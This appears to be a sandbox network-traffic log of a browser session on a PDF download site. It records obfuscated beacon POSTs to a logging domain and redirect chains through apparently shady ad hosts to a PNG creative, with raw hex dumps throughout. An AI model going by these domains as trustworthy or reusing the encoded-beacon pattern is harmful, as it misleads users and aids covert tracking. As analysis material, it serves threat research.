2025-01-10 08:50:15 UTC	553	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>cloudflare</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:15 UTC	700	OUT	POST /log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1 Host: fleraprt.com Connection: keep-alive Content-Length: 2024 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?0 Accept: / Origin: https://pdfdrive.com.co Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pdfdrive.com.co/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:15 UTC	2024	OUT	Data Raw: 4c 1b 52 52 1f 1c 26 1c 14 05 67 1f 1c 4b 12 03 01 05 50 0e 4c 5f 03 0e 11 1a 58 16 10 4a 4f 40 79 27 3e 75 24 4a 46 2c 1d 5b 09 01 52 15 13 60 0f 08 12 09 1b 42 09 47 4a 17 51 4a 46 38 05 5d 08 19 64 51 52 52 1f 16 59 2c 10 14 51 0a 1c 19 49 39 1b 09 08 51 1c 02 1e 19 1b 06 02 54 49 58 45 21 08 2d 3c 10 48 46 4e 38 05 5d 08 19 64 51 52 52 1f 16 59 0c 07 0b 4e 0c 0b 10 43 46 4c 19 04 16 54 4f 70 56 5c 51 16 01 59 21 1b 01 16 49 51 7e 0e 05 09 07 17 1d 4c 41 15 4b 43 46 58 5e 48 5e 59 40 4c 13 16 1b 5b 59 5e 5b 5e 16 19 1a 15 03 02 04 42 54 55 4a 02 0a 1a 53 40 0e 57 46 4c 1c 1b 43 4c 57 06 0b 0b 06 56 46 0e 01 1d 40 02 51 41 00 4d 48 19 13 50 0e 5e 41 15 4e 4a 14 40 54 55 4a 1c 1a 1a 53 49 15 43 1d 08 08 50 0e 5f 41 15 4a 52 5e 58 5e 40 5f 43 4e 1a 1a 11 Data Ascii: LRR&gKPL_XJO@y'>u$JF,[R`BGJQJF8]dQRRY,QI9QTIXE!-<HFN8]dQRRYNCFLTOpV\QY!IQ~LAKCFX^H^Y@L[Y^[^BTUJS@WFLCLWVF@QAMHP^ANJ@TUJSICP_AJR^X^@_CN
2025-01-10 08:50:16 UTC	467	IN	HTTP/1.1 200 OK Server: nginx/1.25.5 Date: Fri, 10 Jan 2025 08:50:16 GMT Content-Type: application/json; charset=utf-8 Content-Length: 12 Connection: close Access-Control-Allow-Origin: https://pdfdrive.com.co Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match Access-Control-Allow-Credentials: true
2025-01-10 08:50:16 UTC	12	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 32 7d Data Ascii: {"status":2}

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:15 UTC	705	OUT	POST /async_log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1 Host: fleraprt.com Connection: keep-alive Content-Length: 454 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?0 Accept: / Origin: https://pdfdrive.com.co Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pdfdrive.com.co/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:15 UTC	454	OUT	Data Raw: 4c 1b 5b 5f 1e 00 1c 06 2a 0b 5e 1b 18 54 04 48 54 5b 5e 16 0c 0c 43 1b 09 4d 58 0d 0a 37 17 03 4c 4b 43 08 4d 48 0d 03 13 46 09 04 59 5e 11 0c 4b 48 5b 0b 1d 03 4a 0e 10 57 06 35 1a 02 1f 51 4c 57 07 15 11 52 13 17 1a 00 14 10 5f 00 17 5e 3e 1e 07 06 17 16 54 03 42 55 5f 1a 58 08 1c 1e 10 0e 1a 53 48 44 4d 48 0d 07 1b 51 00 19 68 50 57 14 40 46 48 0c 17 5b 09 5f 40 5f 4c 53 5e 0d 46 19 5a 0f 05 5d 1e 54 4f 55 4e 45 17 01 0c 5e 18 58 03 5b 57 08 43 52 4c 41 15 58 55 50 13 08 10 09 01 07 67 00 1d 1b 5b 48 4c 47 50 40 1c 0c 51 5f 5a 55 25 17 16 1d 07 01 5d 36 10 5d 43 50 4c 5c 4a 00 57 58 0f 0c 11 1a 58 05 1d 1e 10 10 4c 00 0a 5c 13 35 07 0f 50 0e 4c 4f 1b 1b 50 57 17 14 18 01 12 0c 67 00 1d 1b 5b 48 4c 47 50 57 1b 1e 43 56 5e 69 13 00 26 59 57 58 1a 19 0c Data Ascii: L[_*^THT[^CMX7LKCMHFY^KH[JW5QLWR_^>TBU_XSHDMHQhPW@FH[_@_LS^FZ]TOUNE^X[WCRLAXUPg[HLGP@Q_ZU%]6]CPL\JWXXL\5PLOPWg[HLGPWCV^i&YWX
2025-01-10 08:50:16 UTC	419	IN	HTTP/1.1 200 OK Server: nginx/1.25.5 Date: Fri, 10 Jan 2025 08:50:16 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: https://pdfdrive.com.co Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match Access-Control-Allow-Credentials: true

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:17 UTC	432	OUT	GET /log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1 Host: fleraprt.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:17 UTC	453	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.5 Date: Fri, 10 Jan 2025 08:50:17 GMT Content-Type: application/json; charset=utf-8 Content-Length: 25 Connection: close Access-Control-Allow-Origin: Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match Access-Control-Allow-Credentials: true
2025-01-10 08:50:17 UTC	25	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 30 2c 22 65 72 72 6f 72 22 3a 31 30 30 31 7d Data Ascii: {"status":0,"error":1001}

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:17 UTC	438	OUT	GET /async_log/add?cid=1db9169f-90f4-4b2d-b517-bc47aab19c1f&ruid=ed23ba4c-c01e-41d9-a71d-bd8c8fd24843 HTTP/1.1 Host: fleraprt.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:17 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.25.5 Date: Fri, 10 Jan 2025 08:50:17 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE Access-Control-Allow-Headers: Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, X-Forwarded-For, If-None-Match Access-Control-Allow-Credentials: true

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:18 UTC	596	OUT	GET /v2/641/e977ce71-cf2f-11ef-90a7-5eb0b9f2b61c/1/ic HTTP/1.1 Host: icon.eu.ptmnd.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:18 UTC	1150	IN	HTTP/1.1 302 Found Date: Fri, 10 Jan 2025 08:50:18 GMT Content-Length: 0 Connection: close Server: BunnyCDN-FR1-1216 CDN-PullZone: 1117332 CDN-Uid: 5ceed8e7-cd08-4fa9-9fd5-2c309512d291 CDN-RequestCountryCode: US Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Location: https://want-some-psh.net/icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog Pragma: no-cache CDN-ProxyVer: 1.07 CDN-RequestPullSuccess: True CDN-RequestPullCode: 302 CDN-CachedAt: 01/10/2025 08:50:18 CDN-EdgeStorageId: 1216 CDN-Status: 302 CDN-RequestTime: 1 CDN-RequestId: 67714392e15adfcdddb623ad1dfb3343 CDN-Cache: MISS

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:19 UTC	1118	OUT	GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog HTTP/1.1 Host: want-some-psh.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:20 UTC	956	IN	HTTP/1.1 307 Temporary Redirect Server: Angie Date: Fri, 10 Jan 2025 08:50:19 GMT Content-Length: 0 Connection: close Accept-Ch: Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Model, Sec-CH-UA-Bitness, Sec-CH-UA-Wow64 Location: https://want-some-psh.net/icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df4b

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:21 UTC	1131	OUT	GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df4b HTTP/1.1 Host: want-some-psh.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:21 UTC	439	IN	HTTP/1.1 301 Moved Permanently Server: Angie Date: Fri, 10 Jan 2025 08:50:21 GMT Content-Length: 0 Connection: close Accept-Ch: Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Model, Sec-CH-UA-Bitness, Sec-CH-UA-Wow64 Referrer-Policy: no-referrer Location: https://cdn4image.com/creatives/888/527/192_0_1736428969326.png

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:22 UTC	585	OUT	GET /creatives/888/527/192_0_1736428969326.png HTTP/1.1 Host: cdn4image.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:22 UTC	299	IN	HTTP/1.1 200 OK Server: Angie Date: Fri, 10 Jan 2025 08:50:22 GMT Content-Type: image/png Content-Length: 26791 Last-Modified: Thu, 09 Jan 2025 14:20:30 GMT Connection: close Expires: Sat, 11 Jan 2025 08:50:22 GMT Cache-Control: max-age=86400 Cache-Control: public Accept-Ranges: bytes
2025-01-10 08:50:22 UTC	16085	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 00 50 4c 54 45 59 5a 55 5c 5c 57 53 54 51 49 4b 47 4b 4c 49 5c 5d 59 56 57 54 61 61 5d 51 52 50 60 60 5c 51 52 4e 55 56 51 63 63 5e 36 3a 35 64 64 60 67 67 63 5f 5f 5a 66 65 61 58 58 53 4f 50 4c 4c 4d 4b 5a 5b 58 39 3c 36 47 49 46 38 3d 3a 32 38 34 40 43 3f 45 47 44 3b 3f 3b 42 45 41 4d 4f 4c 57 58 56 3b 3d 38 35 38 32 4f 50 4e 3f 41 3c 54 55 53 4e 4e 4a 5e 5e 5b bb ae a0 31 35 2f 36 3b 37 53 54 4f 3c 41 3d b5 a8 99 b1 a6 97 74 71 65 45 46 41 9d 92 82 70 6d 62 f5 e3 d5 6e 69 5f ae a2 92 f8 e6 d9 7e 79 Data Ascii: PNGIHDRe5gAMAasRGBpHYsPLTEYZU\\WSTQIKGKLI\]YVWTaa]QRP``\QRNUVQcc^6:5dd`ggc__ZfeaXXSOPLLMKZ[X9<6GIF8=:284@C?EGD;?;BEAMOLWXV;=8582OPN?A<TUSNNJ^^[15/6;7STO<A=tqeEFApmbni_~y
2025-01-10 08:50:22 UTC	10706	IN	Data Raw: 4f 47 86 92 61 8a b2 c6 08 6b 24 06 0e 80 44 e4 22 54 58 94 53 85 91 02 9d 14 09 88 b0 69 4a cc dc 1f 89 eb 12 8b f9 01 97 a2 54 06 5c 17 0c 7a e0 f2 58 2c 18 cb e5 06 3f 39 d7 e9 07 16 3c cf a7 a0 47 05 22 59 7e 70 70 e0 af 67 7f 66 af d9 8f c3 e8 70 ee 15 fd 00 5e be 27 16 90 34 d5 d5 d4 34 35 a9 d5 ea 66 bd 85 84 96 d1 ab d3 69 cc 16 97 5a ad b7 d9 e2 6d a1 50 9c 31 db 5b ba 7e db fe e3 b7 80 00 39 da 33 65 98 9a 9b 9d bd 0e 6f 6f b5 c6 06 06 e0 cd c1 80 60 49 8c 24 2e cc a2 0b 80 82 48 00 3d 91 c6 1d 81 a6 c3 ff 10 17 56 f4 0b 40 c7 a0 63 07 82 c1 20 f8 00 ae ce 12 b1 18 91 cb 8d 8c 0f c6 08 ff 38 54 4d a9 d4 5a 2a 97 f3 13 fe 95 41 7e 7c e6 6f ff 33 d6 d4 ef 87 f8 69 3b f0 cd 13 0b 10 7c 43 ad bc 16 f6 06 89 ae ae ee 48 33 1c 50 28 43 bd a0 53 bb 48 Data Ascii: OGak$D"TXSiJT\zX,?9<G"Y~ppgfp^'445fiZmP1[~93eoo`I$.H=V@c 8TMZ*A~\|o3i;\|CH3P(CSH

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:24 UTC	384	OUT	GET /creatives/888/527/192_0_1736428969326.png HTTP/1.1 Host: cdn4image.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:24 UTC	299	IN	HTTP/1.1 200 OK Server: Angie Date: Fri, 10 Jan 2025 08:50:24 GMT Content-Type: image/png Content-Length: 26791 Last-Modified: Thu, 09 Jan 2025 14:06:33 GMT Connection: close Expires: Sat, 11 Jan 2025 08:50:24 GMT Cache-Control: max-age=86400 Cache-Control: public Accept-Ranges: bytes
2025-01-10 08:50:24 UTC	16085	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 c0 08 03 00 00 00 65 02 9c 35 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 00 50 4c 54 45 59 5a 55 5c 5c 57 53 54 51 49 4b 47 4b 4c 49 5c 5d 59 56 57 54 61 61 5d 51 52 50 60 60 5c 51 52 4e 55 56 51 63 63 5e 36 3a 35 64 64 60 67 67 63 5f 5f 5a 66 65 61 58 58 53 4f 50 4c 4c 4d 4b 5a 5b 58 39 3c 36 47 49 46 38 3d 3a 32 38 34 40 43 3f 45 47 44 3b 3f 3b 42 45 41 4d 4f 4c 57 58 56 3b 3d 38 35 38 32 4f 50 4e 3f 41 3c 54 55 53 4e 4e 4a 5e 5e 5b bb ae a0 31 35 2f 36 3b 37 53 54 4f 3c 41 3d b5 a8 99 b1 a6 97 74 71 65 45 46 41 9d 92 82 70 6d 62 f5 e3 d5 6e 69 5f ae a2 92 f8 e6 d9 7e 79 Data Ascii: PNGIHDRe5gAMAasRGBpHYsPLTEYZU\\WSTQIKGKLI\]YVWTaa]QRP``\QRNUVQcc^6:5dd`ggc__ZfeaXXSOPLLMKZ[X9<6GIF8=:284@C?EGD;?;BEAMOLWXV;=8582OPN?A<TUSNNJ^^[15/6;7STO<A=tqeEFApmbni_~y
2025-01-10 08:50:24 UTC	10706	IN	Data Raw: 4f 47 86 92 61 8a b2 c6 08 6b 24 06 0e 80 44 e4 22 54 58 94 53 85 91 02 9d 14 09 88 b0 69 4a cc dc 1f 89 eb 12 8b f9 01 97 a2 54 06 5c 17 0c 7a e0 f2 58 2c 18 cb e5 06 3f 39 d7 e9 07 16 3c cf a7 a0 47 05 22 59 7e 70 70 e0 af 67 7f 66 af d9 8f c3 e8 70 ee 15 fd 00 5e be 27 16 90 34 d5 d5 d4 34 35 a9 d5 ea 66 bd 85 84 96 d1 ab d3 69 cc 16 97 5a ad b7 d9 e2 6d a1 50 9c 31 db 5b ba 7e db fe e3 b7 80 00 39 da 33 65 98 9a 9b 9d bd 0e 6f 6f b5 c6 06 06 e0 cd c1 80 60 49 8c 24 2e cc a2 0b 80 82 48 00 3d 91 c6 1d 81 a6 c3 ff 10 17 56 f4 0b 40 c7 a0 63 07 82 c1 20 f8 00 ae ce 12 b1 18 91 cb 8d 8c 0f c6 08 ff 38 54 4d a9 d4 5a 2a 97 f3 13 fe 95 41 7e 7c e6 6f ff 33 d6 d4 ef 87 f8 69 3b f0 cd 13 0b 10 7c 43 ad bc 16 f6 06 89 ae ae ee 48 33 1c 50 28 43 bd a0 53 bb 48 Data Ascii: OGak$D"TXSiJT\zX,?9<G"Y~ppgfp^'445fiZmP1[~93eoo`I$.H=V@c 8TMZ*A~\|o3i;\|CH3P(CSH

Timestamp	Bytes transferred	Direction	Data
2025-01-10 08:50:25 UTC	1118	OUT	GET /icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog HTTP/1.1 Host: want-some-psh.net Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-01-10 08:50:26 UTC	956	IN	HTTP/1.1 307 Temporary Redirect Server: Angie Date: Fri, 10 Jan 2025 08:50:26 GMT Content-Length: 0 Connection: close Accept-Ch: Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Model, Sec-CH-UA-Bitness, Sec-CH-UA-Wow64 Location: https://want-some-psh.net/icn/eL6SQtZP7SKaX9wwYmiK5l7_Hv0WtwXIm5OrzM4_QzGFkygQptCKuJQbOSocJr48m4eQLC0fjrFdUYZ1CmLatq4Cyx5IPQIXfvkA04l3XVUQwX7qrDMVU6n9lBdgd_VlT3qToTWJm1Zsh5lAhhDNZRdih-M7rXcE7qDiGoHwvEn_SCf-F3WkneilPJEjzP03rCPgVsnoB-mVU_0-N5Vjbb6XmfxHB23cp0W6w0RlrdeLW1h-E6lANgvLYjVxD8juQa-plvms7WiN-4tzbYQnbk1PvXM61RFjx66Hp_vd_0K8YHM05Hb9Wn7PBU_KJQZ5yJqGrjFKWbVp3tQF6jPb_RIVqaGwuumZHq09QZNwWN0gWdGMrIaK5J5_OFNyWU4YsYUqVFALdlyj_6gj_3Jn7F97bklljYnuyyOgkEY_wEG9YktPtmx4q-1LRNhv1F5fFX5pd2Yo45v8tYfvlPNYxapLKICt1AhrhrFF3OK9Me6eb2g2EZ1SgUCtIV8fkWo1CLoZ2KYp_RLpzJCYHFwB9IoOE0eBdCmhYslDkTI1Qerf-RvNLwwGog?wch=6780df51

